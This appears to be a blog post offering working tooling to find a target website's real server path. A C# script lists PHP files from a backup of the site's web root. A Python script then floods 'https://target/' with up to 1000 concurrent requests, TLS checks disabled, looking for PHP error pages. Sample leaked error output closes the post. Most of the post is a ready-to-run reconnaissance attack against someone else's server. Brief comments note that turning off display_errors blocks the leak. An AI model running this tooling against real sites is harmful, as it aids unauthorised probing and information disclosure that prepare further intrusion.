2020-10-31 | Python | UNLOCK

Finding a site's real filesystem path from a backup copy of its source code

BackupGetFiles.cs

step1: GetBackupFiles

using System;
using System.IO;
using System.Collections.Generic;
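/// <summary>
/// Walks a local backup copy of a web root and writes the relative paths of the
/// matching source files (".php" by default) to a text file named after the
/// last segment of the root path.
/// </summary>
class test
{
    /// <summary>
    /// Entry point: redirects console output into "&lt;last root segment&gt;.txt",
    /// runs the directory walk, then restores the console and waits for a key press.
    /// </summary>
    /// <param name="args">Command-line arguments; not used.</param>
    static void Main(string[] args)
    {
        string root = @"?:\Backup\www.target.com";

        // The output file is named after the last path segment of root. Trimming
        // trailing separators first covers "dir", "dir/" and "dir\" in one step,
        // and looking for either separator handles mixed-separator paths.
        string trimmed = root.TrimEnd('/', '\\');
        int cut = trimmed.LastIndexOfAny(new char[] { '/', '\\' });
        string currentr = cut >= 0 ? trimmed.Substring(cut + 1) : trimmed;

        DirectoryInfo info = new DirectoryInfo(root);
        TextWriter tmp = Console.Out;

        // using + finally: the file is flushed and closed, and the console is
        // restored, even when the walk throws (for example on an unreadable directory).
        using (StreamWriter sw = new StreamWriter(currentr + ".txt"))
        {
            Console.SetOut(sw);
            try
            {
                ViewDirectory(info, root);
            }
            finally
            {
                Console.SetOut(tmp);
            }
        }

        Console.WriteLine("WriteFileok => " + currentr + ".txt");
        Console.ReadKey();
    }

    /// <summary>
    /// Recursively prints the files below <paramref name="info"/> whose extension
    /// matches <paramref name="end"/>, skipping files that sit directly in the root.
    /// </summary>
    /// <param name="info">Directory to list in this call.</param>
    /// <param name="r">Root path of the walk; it is stripped from each file's full path.</param>
    /// <param name="end">File extension to keep, with or without the leading dot.</param>
    /// <param name="nfolders">
    /// When true, print the root-relative path (e.g. /admin/sql.php); when false, print
    /// only the file name (e.g. sql.php), which produces duplicates such as index.php.
    /// </param>
    static void ViewDirectory(DirectoryInfo info, string r, string end = "php", bool nfolders = true)
    {
        // FileInfo.FullName is an absolute, normalised path, so the root is normalised
        // the same way. Dropping its trailing separator keeps the leading "/" on every
        // relative path, which the depth check below relies on.
        string prefix = Path.GetFullPath(r).TrimEnd('/', '\\');

        // Compare against ".ext" so that a name merely ending in the letters (e.g. "xphp")
        // is not taken for a match.
        string suffix = "." + end.TrimStart('.');

        foreach (FileInfo file in info.GetFiles())
        {
            string full = file.FullName;

            // Strip the root only where it is a prefix; Replace() would also remove
            // later occurrences of the same text inside the path.
            string rfile = full.StartsWith(prefix, StringComparison.Ordinal)
                ? full.Substring(prefix.Length)
                : full;
            rfile = rfile.Replace("\\", "/");

            // Keep only files with the requested extension.
            if (!rfile.EndsWith(suffix, StringComparison.Ordinal))
            {
                continue;
            }

            // "/name.ext" splits into exactly two parts: a file in the root itself, which is skipped.
            if (rfile.Split('/').Length == 2)
            {
                continue;
            }

            // file.Name is used for the bare-name mode because FileInfo.ToString()
            // does not return the same text on every runtime.
            Console.WriteLine(nfolders ? rfile : file.Name);
        }

        foreach (DirectoryInfo d in info.GetDirectories())
        {
            // Pass end and nfolders down; otherwise every subdirectory would fall
            // back to the defaults regardless of what the caller asked for.
            ViewDirectory(d, r, end, nfolders);
        }
    }
}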

blind_fuzz.py

step2: blind fuzz error

import requests
from concurrent.futures import ThreadPoolExecutor

# Silence urllib3's warnings, including the InsecureRequestWarning that is emitted for
# every request made with verify=False (as error_fuzz does).
# NOTE(review): this also hides the only runtime reminder that TLS certificate
# validation is switched off for these requests.
requests.packages.urllib3.disable_warnings()
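def error_fuzz(url):
    """Fetch ``url`` and print it when the response looks like a PHP error page.

    A response is reported when its body contains the last path segment of the
    final URL (PHP error messages name the failing script), the word
    ``Warning``, or the phrase ``Fatal error``. Each URL is reported at most once.

    Args:
        url: Absolute URL to request.

    Returns:
        None. Results are printed to stdout.
    """
    try:
        # NOTE(review): verify=False disables TLS certificate validation, so the
        # response is not authenticated as coming from the intended host.
        # A timeout keeps an unresponsive host from pinning a worker thread forever.
        r = requests.get(url, allow_redirects=True, verify=False, timeout=10)
    except requests.RequestException as exc:
        # Inside a thread pool an uncaught exception is stored on the future and
        # never shown, so the failure is reported here instead.
        print('[-].request failed => {} ({})'.format(url, exc))
        return

    selfname = r.url.split("/")
    body = r.text

    # A URL ending in "/" has an empty last segment, and "" is contained in every
    # string, so that case must not count as a match.
    names_itself = selfname[-1] != "" and selfname[-1] in body

    # PHP error markers.
    if names_itself or "Warning" in body or "Fatal error" in body:
        print('[+].getone Maybe Error => '+r.url)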


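# Read the candidate relative paths, one per line. The context manager closes the
# file handle, and blank lines are dropped so they do not turn into requests for
# the bare site root.
with open('target.txt', 'r', encoding='UTF-8') as fh:
    filedic = [line.strip() for line in fh if line.strip()]

# 1000 is the upper bound on worker threads, i.e. on simultaneous requests sent to
# the single host below; leaving the with-block waits for all submitted jobs.
with ThreadPoolExecutor(1000) as task_executor:
    for url in filedic:
        url = "https://target/{}".format(url)
        task_executor.submit(error_fuzz, url)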

verify

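step3:
Request the URLs reported in step 2 (target.com/error.files)
Verify the target's real path from the PHP error output. The absolute path is disclosed only because the server returns PHP warnings and fatal errors in the response body; with display_errors turned off and errors written to a server-side log, these requests reveal nothing.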

Warning: require(/e/class/connect.php): failed to open stream: No such file or directory in /www/wwwroot/target/e/?.php on line 2

Fatal error: require(): Failed opening required '/e/class/connect.php' (include_path='.:/www/server/php/56/lib/php') in /www/wwwroot/target/e/?.php on line 2
